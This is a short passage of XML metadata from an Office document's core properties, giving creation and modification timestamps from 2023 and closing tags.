  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-17T06:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-02T17:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>